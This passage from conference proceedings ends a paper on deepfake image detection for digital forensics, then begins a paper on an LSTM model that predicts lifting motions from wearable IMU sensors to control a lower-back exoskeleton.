Accuracy is the performance metric used to evaluate our model. Two graphs show the accuracy and loss during training. Figure 4 illustrates the training and validation curves for the accuracy and loss of the trained model. The confusion matrix of the model is shown in Fig. 5, which gives the actual and predicted numbers of fake and real images. From the confusion matrix, the test accuracy is 92%. Figure 6 shows an example of the class predicted by the model for an image.
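Accuracy follows directly from the four cells of a binary confusion matrix, as the short sketch below shows. The counts in the example are hypothetical, chosen only to illustrate the arithmetic; they are not the values in Fig. 5. The function names are also illustrative.

```python
def accuracy_from_confusion(tp, fp, fn, tn):
    """Fraction of all predictions that are correct."""
    return (tp + tn) / (tp + fp + fn + tn)


def precision_recall(tp, fp, fn):
    """Precision and recall for the positive class."""
    return tp / (tp + fp), tp / (tp + fn)


# HYPOTHETICAL counts for 100 test images (not taken from Fig. 5):
# 45 true positives, 3 false positives, 5 false negatives, 47 true negatives.
acc = accuracy_from_confusion(tp=45, fp=3, fn=5, tn=47)
precision, recall = precision_recall(tp=45, fp=3, fn=5)
```

Precision and recall are included because accuracy alone does not show whether errors fall mainly on the fake class or on the real class.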
Fig. 4. Training and validation learning curves (accuracy and loss)
Fig. 5. Confusion matrix of the model
Fig. 6. Example of a predicted image
6 Conclusion
Artificial intelligence is rapidly becoming one of the most important applied sciences across fields. This report summarizes several AI applications in forensics and concludes that AI can help forensic experts or investigators reduce the time taken on various tasks and thereby improve their performance. AI applications that are prevalent in forensic science include pattern recognition, handling large amounts of data, and providing legal solutions. Researchers have carried out various studies to understand how forensic science benefits from AI technologies in different use cases, such as drowning diagnosis from images and age and gender estimation. As part of our study, we implemented a neural network model based on the ResNet50 architecture to detect Deepfake images, which could be useful in digital forensics. The proposed model can differentiate real and fake images with an accuracy of around 92%.
References
1. Homma, N., et al.: A deep learning aided drowning diagnosis for forensic investigations using post-mortem lung CT images. In: 2020 42nd Annual International Conference of the IEEE Engineering in Medicine & Biology Society (EMBC), pp. 1262–1265 (2020). https://doi.org/10.1109/EMBC44109.2020.9175731
2. Qureshi, A.H., et al.: Deep CNN-based computer-aided diagnosis for drowning detection using post-mortem lungs CT images. In: 2021 IEEE International Conference on Bioinformatics and Biomedicine (BIBM), pp. 2309–2313 (2021). https://doi.org/10.1109/BIBM52615.2021.9669644
3. Hou, W., et al.: Exploring effective DNN models for forensic age estimation based on panoramic radiograph images. In: 2021 International Joint Conference on Neural Networks (IJCNN), pp. 1–8 (2021). https://doi.org/10.1109/IJCNN52387.2021.9533672
4. Štern, D., Payer, C., Giuliani, N., Urschler, M.: Automatic age estimation and majority age classification from multi-factorial MRI data. IEEE J. Biomed. Health Inform. 23(4), 1392–1403 (2019). https://doi.org/10.1109/JBHI.2018.2869606
5. Al-Amodi, A., Kamel, I., Al-Rawi, N.H., Uthman, A., Shetty, S.: Accuracy of linear measurements of maxillary sinus dimensions in gender identification using machine learning. In: 2021 14th International Conference on Developments in eSystems Engineering (DeSE), pp. 407–412 (2021). https://doi.org/10.1109/DeSE54285.2021.9719421
6. Karakuş, S., Kaya, M., Tuncer, S.A., Bahşi, M.T., Açikoğlu, M.: A deep learning based fast face detection and recognition algorithm for forensic analysis. In: 2022 10th International Symposium on Digital Forensics and Security (ISDFS), pp. 1–6 (2022). https://doi.org/10.1109/ISDFS55398.2022.9800785
7. Rodrigues, F.B., Giozza, W.F., de Oliveira Albuquerque, R., García Villalba, L.J.: Natural language processing applied to forensics information extraction with transformers and graph visualization. IEEE Trans. Comput. Soc. Syst. https://doi.org/10.1109/TCSS.2022.3159677
8. Jadhav, E., Sankhla, M.S., Kumar, R.: Artificial intelligence: advancing automation in forensic science & criminal investigation. Seybold Rep. 15, 2064–2075 (2020)
9. Vamsi, V.V.V.N.S., et al.: Deepfake detection in digital media forensics. Glob. Trans. Proc. 3(1), 74–79 (2022). ISSN 2666-285X. https://doi.org/10.1016/j.gltp.2022.04.017
10. Jafar, M.T., Ababneh, M., Al-Zoube, M., Elhassan, A.: Forensics and analysis of deepfake videos. In: 2020 11th International Conference on Information and Communication Systems (ICICS), pp. 053–058 (2020). https://doi.org/10.1109/ICICS49469.2020.239493
11. News Medical Life Sciences: AI in Forensic Science. https://www.news-medical.net/life-sciences/AI-in-Forensic-Science.aspx. Accessed 30 June 2022
12. Mohsin, K.: Artificial intelligence in forensic science. SSRN Electron. J. (2021). https://doi.org/10.2139/ssrn.3910244
13. Gupta, S.: Artificial intelligence in forensic science. IRJET (2020). e-ISSN: 2395-0056
14. Li, Y., Yang, X., Sun, P., Qi, H., Lyu, S.: Celeb-DF: a large-scale challenging dataset for DeepFake forensics. In: IEEE Conference on Computer Vision and Pattern Recognition (CVPR) (2020). Accessed 05 July 2022
15. Karandikar, A.: Deepfake video detection using convolutional neural network. Int. J. Adv. Trends Comput. Sci. Eng. 9, 1311–1315 (2020). https://doi.org/10.30534/ijatcse/2020/62922020
16. Srivastava, V.K.: Forensic face sketch recognition using computer vision (2013)
Deep Learning Based Approach for Human Intention Estimation in Lower-Back Exoskeleton
Valeriya Zanina(B), Gcinizwe Dlamini, and Vadim Palyonov
Innopolis University, Innopolis, Russia
{v.zanina,g.dlamini}@innopolis.university, [email protected]
Abstract. Reducing spinal loads using exoskeletons has become one of the most effective ways to reduce compression of the lumbar spine. Medical research has shown that compression of the lumbar spine is a key risk factor for musculoskeletal injuries. In this paper we present a deep learning based approach aimed at increasing the universality of lower-back support for exoskeletons with an automatic control strategy. Our approach addresses the problem of recognizing human intentions in a lower-back exoskeleton. To train and evaluate our deep learning model, we collected a dataset from wearable sensors such as IMUs. Our model is a long short-term memory (LSTM) neural network that forecasts the next values of 6 angles. Using the mean squared error (MSE) and the coefficient of determination (R²), we evaluated our model on a dataset of 700 samples and achieved 0.3 and 0.99 for MSE and R², respectively.
Keywords: Deep learning · Robots · Exoskeleton · Human intention
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 164–182, 2023. https://doi.org/10.1007/978-3-031-28073-3_12
1 Introduction
A person whose work involves body strain for long periods is subject to an increased risk of backache. To provide back support and help minimize the load on the lower back, wearable robotic devices for the spine have been developed that lower the peak torque requirements around the lumbosacral (L5/S1) joint [11]. Manual work is still present in many industrial environments, and these devices can help reduce the number of injuries in lifting tasks with heavy loads. Lower-back exoskeletons are created to support the human body, increase its power, or reduce the load on the muscles when motion is limited. However, the requirements for exoskeletons are constantly increasing. Devices should not interfere [14,15] with other tasks that are not related to lifting. Passive exoskeletons cannot address this challenge, but active ones can, because they are supplemented by actuators (electric motors, hydraulic actuators, etc.). With active exoskeletons it is important that the assistance motion is generated based on the user’s motion intention. Depending on the phase of body movement, the system has to understand when it is time to activate the motors. Thus, the control strategy of exoskeletons is currently a growing area of research. Solutions for predicting movement types during different activities could be based on models using an optimal control approach. To adapt an active exoskeleton to a person’s back movements, a special methodology based on mechanisms with backbone-based kinematics can be adopted [19]. The human activity can be fixed, set by the user [23], or determined by an algorithm for human activity recognition. Several approaches to human intention estimation have been proposed over the years; however, research on how to predict movements and the load applied to the human body is limited. Our work focuses on predicting human intentions during lifting tasks through a deep learning approach. To assess human intentions, a suit based on inertial modules was created, data were collected and preprocessed, features were selected and extracted, and a recurrent neural network with LSTM units was constructed. The rest of the paper is structured as follows: Sect. 2 presents background and related work. Section 3 presents our proposed methodology and pipeline. Section 4 provides the details of our implementation and experiments. Section 5 presents the obtained results, followed by discussion. The conclusion and future research directions are outlined in Sect. 6.
2 Related Work
Many adaptive control solutions still need to know the human’s intention and, as part of this, to model human behavior. Over the years there has therefore been growing research interest in predicting human behavior to help simplify the design of exoskeletons and other wearable robotics. In addition to the algorithms for evaluating and recognizing human intention, there is also the difficult task of collecting the evaluation data, because the model requires input data for training. Depending on the type of data generated, methods for recognizing human intentions can be divided into two main groups: sensor-based and vision-based. This section provides an overview of these two types and of what other researchers have accomplished in recent years.
2.1 Vision-Based Methods
Artificial data generation can also be based on video. For example, Hyeokhyen et al. [8] suggested using video from large-scale repositories to automatically generate data for virtual IMU sensors that can be used in real-world settings. This approach involves a number of techniques from computer vision, signal processing, and machine learning. A limitation of the research proposed by Hyeokhyen et al. [8] is that it works only with primitive activities in 2D space.
Data based on motion capture technology are actively used and studied in other works [12,21] on predicting human intentions. The largest and most complete dataset is Human3.6M [5], but in our case this approach, as well as other methods based on data from videos and pictures, will not be effective. In conditions of hard work, usually in factories, it would be expensive to run a video surveillance system only for prediction. Moreover, cameras have blind spots, and any object can interfere with reliably determining the human intention. Despite this, computer vision-based systems for collecting activity data in 3D space are also effective. In the research conducted by Yadav et al. [26], human body frames are acquired from a Kinect-v2 sensor, which is a depth sensor-based motion-sensing input device. The Kinect-v2 sensor offers a convenient way to record and capture the activity of human skeleton joints and tracks the 3D skeleton joint coordinates. In that work [26], the 3D coordinates are used to build a 3D bounding box over the tracked human, and suitable features are extracted for identifying different activities. The final dataset, which contains a total of 130,000 samples with 81 attribute values, is fed to deep learning networks for activity recognition. A CNN-LSTM combination called a ConvLSTM network was used. Sumaira Ghazal in [4] used only 2D skeletal data from a camera. To recognize the activity, the main features were extracted from the positions of human skeletal joints in the video using the OpenPose system. This library extracts the locations of skeletal joints for all persons in an image or a video frame. The output of OpenPose is a 3D array that includes information about the number of persons.
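As a simple illustration of the bounding-box step described for [26], the sketch below computes an axis-aligned 3D box around a set of tracked joint coordinates. The axis-aligned form, the function names, and the toy coordinates are all assumptions made for illustration; the exact box construction and features used in [26] are not specified here.

```python
def bounding_box_3d(joints):
    """Return (min_corner, max_corner) of the axis-aligned box around joints.

    joints: iterable of (x, y, z) tuples, e.g. skeleton joint positions.
    """
    xs, ys, zs = zip(*joints)
    return (min(xs), min(ys), min(zs)), (max(xs), max(ys), max(zs))


def box_size(box):
    """Width, height, and depth of a box returned by bounding_box_3d."""
    (x0, y0, z0), (x1, y1, z1) = box
    return (x1 - x0, y1 - y0, z1 - z0)


# Toy joint coordinates in meters (hypothetical values, three joints only).
joints = [(0.0, 1.0, 2.0), (0.5, 1.5, 2.5), (-0.25, 0.25, 2.25)]
box = bounding_box_3d(joints)
size = box_size(box)
```

Quantities such as the box dimensions per frame are one example of the kind of simple geometric feature that can be passed to an activity classifier.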
In light of the aforementioned studies, in this paper a lower-back exoskeleton is used together with a deep recurrent neural network to predict human intention and minimize the spine load when performing heavy tasks, such as those in factories.
2.2 Data from Wearable Sensors
These group contains algorithms based on sensory data obtained from inertial sensors, such as accelerometers or gyroscopes on certain body parts or from mobile phones [25]. The main motivation to use a smartphone as a wearable sensor is due to the fact that the devices are portable and have great computing power, as well as have an open system for integration applications that read data from internal sensors, as well as the relative cheapness of the device [22]. Wang et al. [24] presented a study focused in gait recognition of exoskeleton robots based on the DTW algorithm. The researchers [24] used plantar pressure sensors and joint angle sensors to collect gait data. The pressure sensor was used to measure the pressure on the soles and roots of the feet, and the angle sensor was used to measure the angle of the hip and knee joints. The obtained gait data have to be prepossessed to avoid noise, so the researchers [24] applied S-G filter to smooth this information. Finally, the researchers [24] used DTW algorithm for gait recognition which is a simple and easy algorithm that requires limited
hardware. However, the problem with the standard approach is that the training method cannot effectively use statistical methods and the amount of computation is relatively large. The authors therefore improved it, which resulted in a certain enhancement in recognition rate and real-time performance and showed that the human and the machine can be controlled in a coordinated manner. Roman Chereshnev [2] made a major contribution to the creation of data for activity analysis and recognition as a result of scientific work on a human gait control system using machine learning methods. Chereshnev [2] collected data from a body sensor network consisting of six wearable inertial sensors (accelerometers and gyroscopes) located on the right and left thighs, shins, and feet. In addition, two electromyography (EMG) sensors were placed on the quadriceps to measure muscle activity. In total, 38 signals were collected: 36 from the inertial sensors and 2 from the EMG sensors. The main activities in Chereshnev's work [2] were walking and turning at various speeds on a flat surface, running at various paces, taking stairs up and down, standing, sitting, sitting in a car, standing up from a chair, and cycling. The resulting dataset, named HuGaDB, is publicly available to the research community. However, the dataset still contains no data for the lifting task. Other works have used HuGaDB for activity recognition [1]. For example, in [3] a gait neural network was evaluated both on HuGaDB and on data collected by an inertial-based wearable motion capture device. The entire motion acquisition system consisted of seven inertial measurement units, but only the signals from the lower limbs were selected for human gait prediction [3]. The basic model used two temporal convolutional networks.
The first temporal convolutional network (TCN) processes the original input; the original input and the output of the first TCN are then combined to form the input to the second TCN; finally, a recognition model and a prediction model are added to the network as two fully connected layers. The resulting model is used to predict the accelerations and angular velocities. Sensor-based data collection is a well-studied area, but all research in this field relates to gait or primitive activity recognition. There is practically no contribution to datasets for lifting tasks. The best method for this task is to use wearable sensors to collect the data. Since we are interested not only in recognizing a person's activity but also in assessing their intentions, a deep learning method was chosen to predict the subsequent intention in time based on the readings received from the sensors.
3
Methodology
This section describes an approach for estimating human intentions in a lower-back exoskeleton using wearable sensors and machine learning tools. The pipeline is presented in Fig. 1. No exoskeleton was involved in the data collection process because an exoskeleton-independent algorithm is planned. This section describes the methodology and the development of a suit based on inertial modules. The costume is designed to collect data which will be suitable
for training and testing different algorithms for the estimation of human intention. This section also describes the collected dataset itself, as well as the implementation of human intention recognition in lifting tasks, with the aim of creating an inference system that is appropriate for controlling the torque in a lower-back exoskeleton using deep learning.
Fig. 1. Our proposed approach pipeline
3.1
Data Acquisition via Sensors
An active back exoskeleton should help a person to lift a heavy load. To do this, it needs to know what the movement will be at the next moment and, depending on this, decide what magnitude of torque should be applied to the motors. Based on the literature review, activity recognition with wearable sensors is widely studied, but the proposed methods are relevant mainly for gait recognition. The most popular sensor is the electromyography (EMG) sensor, which can accurately indicate movement, but this approach is not applicable here, since the sensors are attached directly to the human body. During the lifting task, a person may get tired and sweaty, which makes the sensor signals noisy and degrades the data quality. There are several motion capture suits on the world market; for example, an XSens costume is used in [16]. However, such systems usually carry redundant sensors and offer only closed access to the data for processing. Existing datasets, for example USC-HAD [27], HuGaDB [2], PAMAP2 [18], MAREA [6] and others, are not applicable to lifting tasks. It was therefore decided to design a costume for collecting experimental data in order to contribute to datasets for human activity recognition. IMU sensors were selected because they are easy to wear and make the algorithm independent of the design of the lower-back exoskeleton.
3.2
Kinematic Data Analysis
A lifting activity starts from a standing position, turns into a squat-style tilt, and is followed by straightening, during which the lower-back exoskeleton must be engaged in order to compensate for the load on the spine. The arrangement of the sensors was determined by the anatomical behavior of the human body [11] in space during the lifting task. The angles used in the analysis to define the features are shown in Fig. 2.
Fig. 2. Angle definitions for the human by Matthias B. Näf [11], where the blue dot is the lumbosacral joint; (a) knee angle, (b) hip angle, (c) lumbar angle, (d) trunk angle, (e) pelvis inclination; position and orientation of (A) the lower leg, (B) the upper leg, (C) the pelvis, (D) the trunk
Based on the research in [10], the human spine performs three main motions: flexion and extension in the sagittal plane, lateral bending, and axial rotation (Fig. 3).
Fig. 3. The range of movements of the limb
In lifting tasks, flexion and extension in the sagittal plane is the most significant motion in terms of range of movement, and the goal of this paper is to track it. Human spine models propose that the lumbar spine can be modeled as an additional joint contributing to flexion and extension, and from Fig. 2 we can see that the orientation of the pelvis also changes in the lifting task. This is the reason why the costume needs to be
designed with sensors that can track changes in trunk and pelvis orientation. It is not possible to leave sensors only on the back, because each person has their own style of body movement. A person can simply bend down in a stoop style and lift the load (Fig. 4), but this motion can be traumatic for the body when picking up a heavy load.
Fig. 4. Stooping (a) and Squatting (b)
Another way to lift is to use only the legs, through a squat, tilting the lower back minimally. We therefore consider both variants of the movement, so that the controller in the target device can handle either of these intentions, minimizing the load on the lumbosacral joint. Accordingly, the costume is designed as follows: six IMU sensors, two on the back and two on each of the left and right legs, fixed symmetrically with elastic bands. The locations of the sensors are presented in Fig. 5.
3.3
Experimental Protocol
For the experiments, the subjects had to stand, squat to lift the load, and then straighten up with the load, as demonstrated in Fig. 6. This sequence of data is recorded in the dataset. After the researcher starts the recording, the subject stays still for some time and is then commanded to do the experimental exercise at their own tempo. We do not need to recognize the transition from one movement to another, such as standing up from the squat, because we want to know the intentions of a person and estimate the next few angles to control the motors of the exoskeleton. In this work, the task is considered only from the moment the subject starts to move. People perform lifting tasks with different frequency and speed; some bend more with the body, and some more with the legs. During the experiments, it was noticed that it is impossible to lift a heavy load without tilting the back and the legs at the same time, so the selected sensors and their locations can describe the movement accurately for the back-assistance exoskeleton.
Fig. 5. The scheme of the sensors' locations with marked axes on a human body, where a dot means that the axis points toward the observer and an x means that the axis points away from the observer
3.4
Human Intention Estimation
The main task of an active exoskeleton is to follow the movement of a person while strengthening it. However, the exoskeleton must understand what action a person intends to perform in order to switch to control mode and apply exactly as much force as necessary to start the action. Therefore, the estimation of human intention is a necessary task that needs to be solved when designing the control logic of an active exoskeleton.
3.5
Motion Prediction for the Exoskeleton Control with Deep Learning Approach
To develop an exoskeleton control system, the estimation of intention can be divided into two machine learning tasks: classification and regression [17]. Classification means assigning an activity to a certain category, for example standing, lifting a load, or walking, in order to recognize that a movement has begun and it is time to put the motors into active mode. An exoskeleton that provides help on the back should understand when it is necessary to start
Fig. 6. Experimental motion where (a) A person intends to lift the box through a squat, (b) A person is standing with a heavy load
assisting and when not to interfere. The regression task makes it possible to predict a person's future intentions in advance in order to control the magnitude of the torque of the exoskeleton motors. The model predicts the subsequent angle of human movement based on the signals obtained from the IMU sensors.
3.6
Long Short-Term Memory
The long short-term memory (LSTM) architecture has been acknowledged as successful in human activity recognition on smartphones [13]. In addition to the outer recurrence of the RNN, LSTM recurrent networks have LSTM cells with an internal recurrence. An LSTM cell has more parameters and a system of gating units that controls the flow of information, but in general it has the same inputs and outputs as an ordinary recurrent unit. The cells replace the hidden units of recurrent networks and are connected recurrently to each other. The key component of the LSTM is the memory cell. The value of an input feature, computed with a regular artificial neuron unit, can be accumulated into the state if the sigmoidal input gate allows it. The most important component is the state unit $s_i^{(t)}$, which has a linear self-loop. The weight of this self-loop is controlled by a forget gate unit $f_i^{(t)}$ (for time step $t$ and cell $i$), which sets the weight to a value between 0 and 1 via a sigmoid unit:

$$ f_i^{(t)} = \sigma\Big( b_i^f + \sum_j U_{i,j}^f x_j^{(t)} + \sum_j W_{i,j}^f h_j^{(t-1)} \Big), \tag{1} $$

where $x^{(t)}$ is the current input vector, $h^{(t)}$ is the current hidden layer vector, containing the outputs of all the LSTM cells, and $b^f$, $U^f$, $W^f$ are respectively the biases, input weights, and recurrent weights for the forget gates. The external input gate unit $g_i^{(t)}$ is computed as:

$$ g_i^{(t)} = \sigma\Big( b_i^g + \sum_j U_{i,j}^g x_j^{(t)} + \sum_j W_{i,j}^g h_j^{(t-1)} \Big). \tag{2} $$

It is computed similarly to the forget gate but with its own parameters. The output $h_i^{(t)}$ of the LSTM cell (Eq. 3) can be shut off via the output gate $q_i^{(t)}$ (Eq. 4), which also uses a sigmoid unit for gating:

$$ h_i^{(t)} = \tanh\big( s_i^{(t)} \big)\, q_i^{(t)}, \tag{3} $$

$$ q_i^{(t)} = \sigma\Big( b_i^o + \sum_j U_{i,j}^o x_j^{(t)} + \sum_j W_{i,j}^o h_j^{(t-1)} \Big). \tag{4} $$
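As an illustration of Eqs. (1)-(4), the following minimal NumPy sketch performs one time step of an LSTM layer. It is not the authors' implementation: the parameter container `zero_params` and its key names are hypothetical, and the state update `s = f * s_prev + g * candidate` with a tanh candidate is taken from the standard LSTM formulation, since the text does not state it explicitly.

```python
import numpy as np


def sigmoid(z):
    """Logistic sigmoid, applied element-wise."""
    return 1.0 / (1.0 + np.exp(-z))


def zero_params(n_cells, n_inputs):
    """Hypothetical container: biases b_*, input weights U_*, recurrent weights W_*."""
    params = {}
    for gate in ("f", "g", "o", "c"):
        params["b_" + gate] = np.zeros(n_cells)
        params["U_" + gate] = np.zeros((n_cells, n_inputs))
        params["W_" + gate] = np.zeros((n_cells, n_cells))
    return params


def lstm_step(x, h_prev, s_prev, p):
    """One time step: returns the new outputs h and states s of all cells."""
    def unit(gate):
        # b_i + sum_j U_ij x_j + sum_j W_ij h_j(t-1), for every cell i at once
        return p["b_" + gate] + p["U_" + gate] @ x + p["W_" + gate] @ h_prev

    f = sigmoid(unit("f"))          # forget gate, Eq. (1)
    g = sigmoid(unit("g"))          # external input gate, Eq. (2)
    q = sigmoid(unit("o"))          # output gate, Eq. (4)
    candidate = np.tanh(unit("c"))  # assumed candidate input (standard LSTM)
    s = f * s_prev + g * candidate  # assumed state update (standard LSTM)
    h = np.tanh(s) * q              # cell output, Eq. (3)
    return h, s
```

With all parameters at zero every gate equals 0.5 and the candidate is 0, so the state and the output stay at zero; trained weights would replace the zeros.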
To scale and normalize the input to the proposed LSTM model, we used a MinMax scaler, which transforms all features into the range between 0 and 1. After scaling, the data is passed to the deep learning model, which has one LSTM layer and one fully connected layer. The activation function is tanh, and the Adam optimizer [7] is used.
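The min-max scaling step can be sketched as follows. The function names are hypothetical, and fitting the minimum and maximum on the training partition only and reusing them for the other partitions is an assumption; the text does not say how the scaler was fitted.

```python
import numpy as np


def fit_min_max(train):
    """Per-feature minimum and maximum of a (samples, features) array."""
    return train.min(axis=0), train.max(axis=0)


def apply_min_max(data, lo, hi):
    """Map each feature to [0, 1] using previously fitted bounds."""
    # Guard against constant features to avoid division by zero.
    span = np.where(hi > lo, hi - lo, 1.0)
    return (data - lo) / span
```

Values outside the fitted range (for example in unseen recordings) map outside [0, 1], which is worth keeping in mind when the scaler is reused at inference time.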
4
Implementation
This section presents implementation details, from data extraction to deep learning model evaluation.
4.1
Hardware Implementation
The sensors were wired to each other and communicate over the I2C protocol, with two sensors with different addresses on each bus, attached to an ESP32 microcontroller. The hardware implementation of the costume is presented in Fig. 7. Each IMU sensor includes a three-axis accelerometer, a gyroscope, and a magnetometer. However, magnetometer data was not collected during the experiments: because of gravity, the accelerometer perceives the downward direction, which makes the orientation easy to calculate, so the magnetometer, which senses the Earth's magnetic field, was not used for calculating yaw. In this task we need to find the orientation, which describes rotation relative to some coordinate system, so the values we considered came from only two sensors, the accelerometer and the gyroscope. A typical accelerometer measures acceleration along the x, y, and z axes in g or m/s². A gyroscope measures angular speed about the x, y, and z axes in deg/s or rad/s. The ESP32 module was chosen because of its size and ease of programming, as well as its integrated Bluetooth and WiFi modules. During the experiments, data is transmitted over WiFi to a laptop in real time and processed locally.
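To illustrate how an accelerometer at rest perceives the downward direction, the sketch below derives two tilt angles from a single gravity reading. The axis convention (z pointing along gravity at rest) and the function name are assumptions for illustration and do not necessarily match the mounting of the sensors on the costume.

```python
import math


def tilt_from_accel(ax, ay, az):
    """Roll and pitch in degrees from one accelerometer reading at rest.

    Assumes the only measured acceleration is gravity and that the z axis
    is aligned with gravity when the sensor lies flat.
    """
    roll = math.atan2(ay, az)
    pitch = math.atan2(-ax, math.hypot(ay, az))
    return math.degrees(roll), math.degrees(pitch)
```

A rotation about the gravity axis leaves the reading unchanged, so this approach gives no information about that third angle.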
Fig. 7. The hardware implementation of the costume for data collection
4.2
Data Format
The sensor data is sent once every 10 ms and recorded in a CSV file for future training of the model. There are approximately 14 samples in one second. The raw dataset is a sequence of values from the 6 sensors. Table 1 shows an example of the data from the IMU sensor located on the right calf, where rb is the sensor identifier, a denotes a value from the accelerometer, g a value from the gyroscope, and x, y, z are the axis names.
Table 1. Example of a part of the dataset with raw data from the accelerometer and gyroscope located on the right calf
rbax      rbay      rbaz      rbgx       rbgy       rbgz
0.069431  -0.40701  9.267955  -0.015854  -0.006795  -0.010525
0.059855  -0.37589  9.229648  -0.041302  -0.001191  -0.01172
0.14604   -0.38307  9.090784  -0.041168  0.005729   -0.01705
0.15083   -0.36392  9.109938  -0.028378  0.01506    -0.013722
...       ...       ...       ...        ...        ...
0.12689   -0.39025  9.040505  -0.024781  0.01811    -0.011990
The main body of the dataset contains 36 columns: one value for each of the three axes of the accelerometer and the gyroscope from all 6 sensors. Each column holds the values of one axis of one sensor, and each row corresponds to one sample in time. The bottom leg sensors are located on the calf and the top leg sensors on the hip, both on the outer side. In the dataset, the values are arranged in the following order: back top and bottom, left leg top and bottom, right leg top and bottom. Each person performs the movement several times, and one file contains one experiment from one person. The file requires further preprocessing, after which each movement from an experiment is stored in a separate file, as discussed in the next subsection.
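The column layout described above can be sketched in a few lines. Only the identifier rb appears in the text; the other five sensor identifiers below are hypothetical names chosen to follow the same pattern and the stated order, and the reader function assumes a CSV file with a header row.

```python
import csv
import io

# Order from the text: back top/bottom, left leg top/bottom, right leg top/bottom.
# Only "rb" is confirmed by the text; the other identifiers are assumed.
SENSOR_IDS = ["bt", "bb", "lt", "lb", "rt", "rb"]


def column_names():
    """36 names: sensor id + a/g (accelerometer/gyroscope) + axis."""
    return [s + kind + axis for s in SENSOR_IDS for kind in "ag" for axis in "xyz"]


def read_recording(csv_text):
    """Parse CSV text with a header row into a list of {column: float} rows."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return [{name: float(value) for name, value in row.items()} for row in reader]
```

For example, `column_names()[-6:]` yields the six right-calf columns shown in Table 1.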
4.3
Feature Extraction
Raw data must be processed in order to turn it into features, which are represented by orientation. First, it is very important to calibrate the sensors before using them, because there are always some errors due to their mechanical characteristics. Calibration is performed by subtracting the offset value for each axis, since inertial sensors usually exhibit bias drift. An example is shown in Fig. 8.
Fig. 8. The example of calibration data from sensor, located on back top axes orientation
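Offset calibration of this kind can be sketched as below. The assumption, not stated in the text, is that the offset is estimated as the mean of samples recorded while the sensor is held still; the function names are hypothetical.

```python
import numpy as np


def estimate_offset(still_samples, expected=0.0):
    """Per-axis offset from samples recorded at rest.

    still_samples: array of shape (samples, axes).
    expected: the ideal reading at rest (0 for a gyroscope axis).
    """
    return still_samples.mean(axis=0) - expected


def remove_offset(samples, offset):
    """Subtract the estimated per-axis offset from every sample."""
    return samples - offset
```

For an accelerometer, `expected` would hold the gravity component on each axis in the rest pose instead of zero.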
When the data is ready, the orientation values from the sensors are used as input for intention estimation, and the output is the next angle. To do this, the raw data needs to be translated into Euler angles: roll, pitch, and yaw. According to the datasheet of the selected modules, the sensor axes are labeled as in Fig. 9. Based on the design of the data collection costume, the zero position of the sensors is vertical, and the sensors on the back are placed perpendicular to the sensors on the legs. The axes along which the rotation takes place then change their location and look as in Fig. 5. Some of the sensors change their polarity of rotation, which is reversed during preprocessing. As a result, the back angle changes positively, as does the data from the upper leg sensors, while the angle of the lower leg sensors is directed in the opposite direction.
Fig. 9. Orientation of axes of sensitivity and polarity of rotation for accelerometer and gyroscope from datasheet
Location and orientation together fully describe how an object is located in space. Euler's rotation theorem shows that in three dimensions any orientation can be achieved by a single rotation around a fixed axis. This gives one general way to represent orientation, the axis-angle representation. Given the trajectory of the selected lifting movement and the location of the sensors on the costume (Fig. 5), the human motion intention can be estimated for the legs from the angle of rotation about the z axis only, and for the back from the angle of rotation about the x axis. When estimating the orientation, we notice that the yaw angle for the leg sensors and the roll angle for the back sensors change significantly, while the other angles vary within the margin of error from person to person. Therefore, for the evaluation we can use the correlation between these angles as they vary over time. In principle, the angles of rotation can be calculated using a single sensor, for example the accelerometer. But this method is not suitable for our task, because it cannot calculate the rotation about the z axis. It is also possible to use only gyroscope data, which for a discrete system gives Eq. 5:

$$ \theta_{n+1} = \theta_n + \omega \Delta t, \tag{5} $$

where $\theta$ is the angle in deg, $\omega$ is the angular speed in deg/s, and $\Delta t$ is the time difference between measurements. Roll, pitch, and yaw can thus be calculated as:

$$ \begin{pmatrix} pitch_{n+1} \\ roll_{n+1} \\ yaw_{n+1} \end{pmatrix} = \begin{pmatrix} pitch_n^G + G^X \Delta t \\ roll_n^G + G^Y \Delta t \\ yaw_n^G + G^Z \Delta t \end{pmatrix} \tag{6} $$

However, the resulting angles are not very clean. The back top sensor is mounted at a roll of about 90°, so its zero position is near 90° rather than zero. For these reasons, it is best to use sensor fusion.
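The discrete integration of Eqs. (5) and (6) can be sketched as follows. The function name is hypothetical, and the mapping of the x, y, z rates to pitch, roll, and yaw follows the ordering of Eq. (6).

```python
import numpy as np


def integrate_gyro(rates_deg_s, dt, start_deg=(0.0, 0.0, 0.0)):
    """Accumulate angles from angular rates, theta[n+1] = theta[n] + omega * dt.

    rates_deg_s: array of shape (N, 3) with rates about x, y, z in deg/s.
    Returns an array of shape (N + 1, 3) with [pitch, roll, yaw] in degrees.
    """
    angles = np.empty((len(rates_deg_s) + 1, 3))
    angles[0] = start_deg
    for n, omega in enumerate(rates_deg_s):
        angles[n + 1] = angles[n] + omega * dt
    return angles
```

Because every step adds the measured rate, any constant bias left in the gyroscope accumulates linearly over time, which is one reason pure integration gives angles that are hard to use on their own.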
Sensor fusion combines data derived from various sensors in order to obtain a resulting value that has less uncertainty than a value from a single sensor [20]. For this task, algorithms such as the Kalman filter, the DCM algorithm with a rotation matrix and PI controller, the complementary filter, or the Madgwick algorithm can be used. In this paper, the last one was selected. The Madgwick algorithm [9] is an orientation filter that can be applied to IMU or MARG sensor arrays. It yields the orientation as quaternions, which can be converted to Euler angles. This particular filter was chosen to obtain the Euler angles because we need the changes of the rotation angle only about certain axes. The filter takes into account the time delta between measurements and the beta value, which sets the degree of confidence in the accelerometer. To estimate the trajectory of lifting the box, we select the most significant axes and take them as features (Fig. 10) of the intention to lift a heavy load.
Fig. 10. The change in the main angles of rotation during the lifting over time using the Madgwick filter
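The conversion from a quaternion to Euler angles mentioned above can be sketched as follows. This is the common Z-Y-X (yaw, pitch, roll) convention for a unit quaternion (w, x, y, z); which convention the authors used is not stated, so this choice is an assumption, and the Madgwick filter itself is not reproduced here.

```python
import math


def quaternion_to_euler(w, x, y, z):
    """Roll, pitch, yaw in degrees from a unit quaternion (Z-Y-X convention)."""
    roll = math.atan2(2.0 * (w * x + y * z), 1.0 - 2.0 * (x * x + y * y))
    # Clamp to [-1, 1] so rounding errors cannot push asin out of its domain.
    sin_pitch = max(-1.0, min(1.0, 2.0 * (w * y - z * x)))
    pitch = math.asin(sin_pitch)
    yaw = math.atan2(2.0 * (w * z + x * y), 1.0 - 2.0 * (y * y + z * z))
    return tuple(math.degrees(a) for a in (roll, pitch, yaw))
```

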